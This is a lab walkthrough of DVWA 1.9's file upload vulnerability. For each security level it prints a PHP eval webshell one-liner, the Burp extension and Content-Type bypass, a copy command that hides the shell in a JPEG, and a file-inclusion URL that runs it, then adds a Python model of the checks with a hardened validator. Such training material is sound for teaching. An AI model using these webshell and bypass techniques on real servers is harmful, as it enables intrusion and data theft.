DVWA (1.9) file upload vulnerability explained

Test platform: DVWA 1.9 running in a phpStudy environment.

1. Low level
Source analysis:

<?php 
if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // Can we move the file to the upload folder? 
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
        // No 
        echo '<pre>Your image was not uploaded.</pre>'; 
    } 
    else { 
        // Yes! 
        echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
    } 
} 
?> 

This level has no filtering function at all. Upload a one-line PHP webshell, <?php @eval($_POST["pass"]);?>, as a .php file, then connect with China Chopper (菜刀) to retrieve database information. While connecting, capture the request with Burp: when China Chopper connects to DVWA, its default cookie selects the impossible level, so intercept the request in Burp and add the cookie to the request headers, Cookie: security=low; PHPSESSID=n693sr05jbtn03nh63ageq57j1, which fixes the connection failure.

2. Medium level
Source analysis:

<?php 

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 

    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ]; 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 

    // Is it an image? 
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && 
        ( $uploaded_size < 100000 ) ) { 

        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 

?> 

This level only filters on the file name. The approach for building the upload: first save the PHP one-liner as a .png file, intercept the request with Burp Suite before clicking upload, then change the file extension to .php inside Burp, and the file uploads successfully. Finally, connect with China Chopper.

3. High level
Source analysis:
<?php

if( isset( $_POST[ 'Upload' ] ) ) { 
    // Where are we going to be writing to? 
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; 
    // returns the bare file name
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); 
    // File information 
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ]; 
    // returns the extension (everything after the last '.')
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1); 
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ]; 
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ]; 
    // Is it an image? 
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) && 
        ( $uploaded_size < 100000 ) && 
        getimagesize( $uploaded_tmp ) ) { 
        // Can we move the file to the upload folder? 
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) { 
            // No 
            echo '<pre>Your image was not uploaded.</pre>'; 
        } 
        else { 
            // Yes! 
            echo "<pre>{$target_path} succesfully uploaded!</pre>"; 
        } 
    } 
    else { 
        // Invalid file 
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; 
    } 
} 
?> 

Function reference:
• stripos() - finds the position of the first occurrence of a string inside another string (case-insensitive)
• strpos() - finds the position of the first occurrence of a string inside another string (case-sensitive)
• strripos() - finds the position of the last occurrence of a string inside another string (case-insensitive)
• strrpos() - finds the position of the last occurrence of a string inside another string (case-sensitive)
getimagesize() retrieves the size of an image and related information. On success it returns an array; on failure it returns FALSE and raises an E_WARNING. It determines the size of any GIF, JPG, PNG, SWF, SWC, PSD, TIFF, BMP, IFF, JP2, JPX, JB2, JPC, XBM or WBMP image file and returns the image dimensions, the file type, and the height and width.
Testing the function in a real environment:

$checkImage=getimagesize($fileTmpName);
var_dump($checkImage);

Output:
array (size=7)
  0 => int 1024
  1 => int 583
  2 => int 2
  3 => string 'width="1024" height="583"' (length=25)
  'bits' => int 8
  'channels' => int 3
  'mime' => string 'image/jpeg' (length=10)

Based on the analysis above, append a one-line webshell to the end of a genuine image by running the following command in a cmd window:

copy  11.jpg/b+11.php/a 123.jpg

Upload the generated image to the server and then connect with China Chopper. Connecting to the image directly does not work, because the webshell inside the image is not recognized; instead, connect through the following path (the file inclusion page):

http://192.168.15.201/DVWA-1.9/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\DVWA-1.9\hackable\uploads\123.jpg
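As an added example (not code from this post or from DVWA), the following Python models the medium and high checks from the PHP source above and puts a hardened validator beside them. It shows why the medium bypass works: $uploaded_type comes from the Content-Type the client sends, so it proves nothing about the bytes. It also shows why the high check accepts the file built with the copy command: the appended PHP sits after the JPEG end-of-image marker, which getimagesize() never looks at. All sample bytes are constructed, and sniff_image() is a magic-byte stand-in for getimagesize(), not the real function.

```python
import re
import secrets

# Constructed sample inputs, not captured uploads.
JPEG_MAGIC = b"\xff\xd8\xff"
JPEG_EOI = b"\xff\xd9"            # JPEG end-of-image marker
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PNG_IEND = b"IEND"                 # last PNG chunk, followed by a 4-byte CRC

PHP_SHELL = b"<?php /* constructed marker standing in for a webshell */ ?>"
CLEAN_JPG = JPEG_MAGIC + b"\xe0" + b"\x00" * 60 + JPEG_EOI
# What `copy 11.jpg/b+11.php/a 123.jpg` produces: image bytes, then PHP.
POLYGLOT_JPG = CLEAN_JPG + PHP_SHELL

ALLOWED_EXT = ("jpg", "jpeg", "png")
MAX_SIZE = 100000


def sniff_image(data):
    """Stand-in for getimagesize(): classifies by leading magic bytes only."""
    if data.startswith(JPEG_MAGIC):
        return "image/jpeg"
    if data.startswith(PNG_MAGIC):
        return "image/png"
    return None


def extension_of(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def medium_check(filename, client_type, data):
    """DVWA medium: only the client-supplied Content-Type and the size are checked."""
    return client_type in ("image/jpeg", "image/png") and len(data) < MAX_SIZE


def high_check(filename, client_type, data):
    """DVWA high: extension whitelist, size, and the file must parse as an image."""
    return (extension_of(filename) in ALLOWED_EXT
            and len(data) < MAX_SIZE
            and sniff_image(data) is not None)


PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


def trailing_bytes(data, mime):
    """Bytes after the image container's end marker; concatenated payloads live here."""
    if mime == "image/jpeg":
        end = data.rfind(JPEG_EOI)
        return data[end + len(JPEG_EOI):] if end != -1 else data
    end = data.rfind(PNG_IEND)
    return data[end + 8:] if end != -1 else data   # IEND tag + 4-byte CRC


def hardened_check(filename, client_type, data):
    """Returns (accepted, stored_name, reason). The client Content-Type is ignored on purpose."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXT:
        return False, None, "extension not allowed"
    if len(data) >= MAX_SIZE:
        return False, None, "too large"
    mime = sniff_image(data)
    if mime is None:
        return False, None, "not an image"
    # The extension must agree with what the bytes actually are.
    if (mime == "image/jpeg") != (ext in ("jpg", "jpeg")):
        return False, None, "extension does not match content"
    # Reject anything glued on after the image ends (the copy-command polyglot).
    if trailing_bytes(data, mime).strip():
        return False, None, "data after end of image"
    # Defense in depth: no PHP open tag anywhere in the file.
    if PHP_OPEN_TAG.search(data):
        return False, None, "php tag inside image"
    # Server-chosen name: the client never controls what lands on disk.
    stored = secrets.token_hex(16) + "." + ("jpg" if mime == "image/jpeg" else "png")
    return True, stored, "ok"


if __name__ == "__main__":
    samples = [
        ("shell.php", "image/png", PHP_SHELL),      # medium bypass: spoofed Content-Type
        ("123.jpg", "image/jpeg", POLYGLOT_JPG),    # high bypass: image with PHP appended
        ("clean.jpg", "image/jpeg", CLEAN_JPG),
    ]
    for name, ctype, blob in samples:
        print(name, "medium:", medium_check(name, ctype, blob),
              "high:", high_check(name, ctype, blob),
              "hardened:", hardened_check(name, ctype, blob))
```

The trailing-bytes check catches the concatenation style of polyglot shown in this post, but not a payload carried inside a metadata segment of an otherwise valid image, so treat it as defense in depth. The controls that actually decide the outcome are the server-chosen file name (the client-supplied name never reaches the file system) and storing uploads where PHP is not executed; even a file that passes every check here remains harmless only if nothing on the server will ever interpret it, which is exactly what the file inclusion path in the URL above defeats.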